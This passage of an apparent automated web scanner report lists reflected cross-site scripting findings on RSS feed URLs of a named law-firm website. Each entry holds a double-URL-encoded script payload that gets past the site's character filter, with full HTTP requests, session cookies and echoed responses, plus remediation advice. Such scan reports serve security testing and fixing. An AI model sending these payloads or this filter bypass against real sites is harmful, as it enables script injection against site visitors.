There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss/practices/Insurancea3861%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e021aa92fc8e/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:21 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss/practices/Insurancea3861"><script>alert(1)</script>021aa92fc8e/rss.xml" value="">
...[SNIP]...

2.189. http://www.wileyrein.com/rss/practices/Insurance/rss.xml [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/Insurance/rss.xml

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dc903%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e8c3f9de4a75 was submitted in the REST URL parameter 4. This input was echoed as dc903"><script>alert(1)</script>8c3f9de4a75 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss/practices/Insurance/rss.xmldc903%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e8c3f9de4a75 HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:22 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss/practices/Insurance/rss.xmldc903"><script>alert(1)</script>8c3f9de4a75" value="">
...[SNIP]...

2.190. http://www.wileyrein.com/rss/practices/Intellectual_Property/rss.xml [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/Intellectual_Property/rss.xml

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a8cc0%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e97bf63e9708 was submitted in the REST URL parameter 1. This input was echoed as a8cc0"><script>alert(1)</script>97bf63e9708 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rssa8cc0%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e97bf63e9708/practices/Intellectual_Property/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:23 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rssa8cc0"><script>alert(1)</script>97bf63e9708/practices/Intellectual_Property/rss.xml" value="">
...[SNIP]...

2.191. http://www.wileyrein.com/rss/practices/Intellectual_Property/rss.xml [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/Intellectual_Property/rss.xml

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ebee6%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e8cb5eed4035 was submitted in the REST URL parameter 2. This input was echoed as ebee6"><script>alert(1)</script>8cb5eed4035 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss/practicesebee6%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e8cb5eed4035/Intellectual_Property/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:24 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss/practicesebee6"><script>alert(1)</script>8cb5eed4035/Intellectual_Property/rss.xml" value="">
...[SNIP]...

2.192. http://www.wileyrein.com/rss/practices/Intellectual_Property/rss.xml [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/Intellectual_Property/rss.xml

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9a6c9%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ef1282db072c was submitted in the REST URL parameter 3. This input was echoed as 9a6c9"><script>alert(1)</script>f1282db072c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss/practices/Intellectual_Property9a6c9%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ef1282db072c/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:25 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss/practices/Intellectual_Property9a6c9"><script>alert(1)</script>f1282db072c/rss.xml" value="">
...[SNIP]...

2.193. http://www.wileyrein.com/rss/practices/Intellectual_Property/rss.xml [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/Intellectual_Property/rss.xml

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f7748%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e1dd7e1a93aa was submitted in the REST URL parameter 4. This input was echoed as f7748"><script>alert(1)</script>1dd7e1a93aa in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss/practices/Intellectual_Property/rss.xmlf7748%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e1dd7e1a93aa HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:26 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss/practices/Intellectual_Property/rss.xmlf7748"><script>alert(1)</script>1dd7e1a93aa" value="">
...[SNIP]...

2.194. http://www.wileyrein.com/rss/practices/International_Trade/rss.xml [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/International_Trade/rss.xml

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d092e%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e1334ddb4b76 was submitted in the REST URL parameter 1. This input was echoed as d092e"><script>alert(1)</script>1334ddb4b76 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rssd092e%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e1334ddb4b76/practices/International_Trade/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:23 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rssd092e"><script>alert(1)</script>1334ddb4b76/practices/International_Trade/rss.xml" value="">
...[SNIP]...

2.195. http://www.wileyrein.com/rss/practices/International_Trade/rss.xml [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/International_Trade/rss.xml

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d46e9%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ef30c22f14ce was submitted in the REST URL parameter 2. This input was echoed as d46e9"><script>alert(1)</script>f30c22f14ce in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss/practicesd46e9%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ef30c22f14ce/International_Trade/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:24 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss/practicesd46e9"><script>alert(1)</script>f30c22f14ce/International_Trade/rss.xml" value="">
...[SNIP]...

2.196. http://www.wileyrein.com/rss/practices/International_Trade/rss.xml [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/International_Trade/rss.xml

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fca14%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea76b08aeebe was submitted in the REST URL parameter 3. This input was echoed as fca14"><script>alert(1)</script>a76b08aeebe in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss/practices/International_Tradefca14%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea76b08aeebe/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:25 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss/practices/International_Tradefca14"><script>alert(1)</script>a76b08aeebe/rss.xml" value="">
...[SNIP]...

2.197. http://www.wileyrein.com/rss/practices/International_Trade/rss.xml [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/International_Trade/rss.xml

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eb24c%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e6e42435c0a7 was submitted in the REST URL parameter 4. This input was echoed as eb24c"><script>alert(1)</script>6e42435c0a7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss/practices/International_Trade/rss.xmleb24c%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e6e42435c0a7 HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:26 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss/practices/International_Trade/rss.xmleb24c"><script>alert(1)</script>6e42435c0a7" value="">
...[SNIP]...

2.198. http://www.wileyrein.com/rss/practices/Litigation/rss.xml [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/Litigation/rss.xml

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2cd05%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e4aa15667da1 was submitted in the REST URL parameter 1. This input was echoed as 2cd05"><script>alert(1)</script>4aa15667da1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss2cd05%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e4aa15667da1/practices/Litigation/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:26 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss2cd05"><script>alert(1)</script>4aa15667da1/practices/Litigation/rss.xml" value="">
...[SNIP]...

2.199. http://www.wileyrein.com/rss/practices/Litigation/rss.xml [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/Litigation/rss.xml

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2c84a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ed9dfe2363ba was submitted in the REST URL parameter 2. This input was echoed as 2c84a"><script>alert(1)</script>d9dfe2363ba in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss/practices2c84a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ed9dfe2363ba/Litigation/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:26 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss/practices2c84a"><script>alert(1)</script>d9dfe2363ba/Litigation/rss.xml" value="">
...[SNIP]...

2.200. http://www.wileyrein.com/rss/practices/Litigation/rss.xml [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/Litigation/rss.xml

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 191ff%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e238461b7a86 was submitted in the REST URL parameter 3. This input was echoed as 191ff"><script>alert(1)</script>238461b7a86 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss/practices/Litigation191ff%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e238461b7a86/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:27 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss/practices/Litigation191ff"><script>alert(1)</script>238461b7a86/rss.xml" value="">
...[SNIP]...

2.201. http://www.wileyrein.com/rss/practices/Litigation/rss.xml [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/Litigation/rss.xml

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 14505%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e478d1333f6d was submitted in the REST URL parameter 4. This input was echoed as 14505"><script>alert(1)</script>478d1333f6d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss/practices/Litigation/rss.xml14505%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e478d1333f6d HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:28 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss/practices/Litigation/rss.xml14505"><script>alert(1)</script>478d1333f6d" value="">
...[SNIP]...

2.202. http://www.wileyrein.com/rss/practices/Postal/rss.xml [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/Postal/rss.xml

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dc84f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e79d0e014d42 was submitted in the REST URL parameter 1. This input was echoed as dc84f"><script>alert(1)</script>79d0e014d42 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rssdc84f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e79d0e014d42/practices/Postal/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:24 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rssdc84f"><script>alert(1)</script>79d0e014d42/practices/Postal/rss.xml" value="">
...[SNIP]...

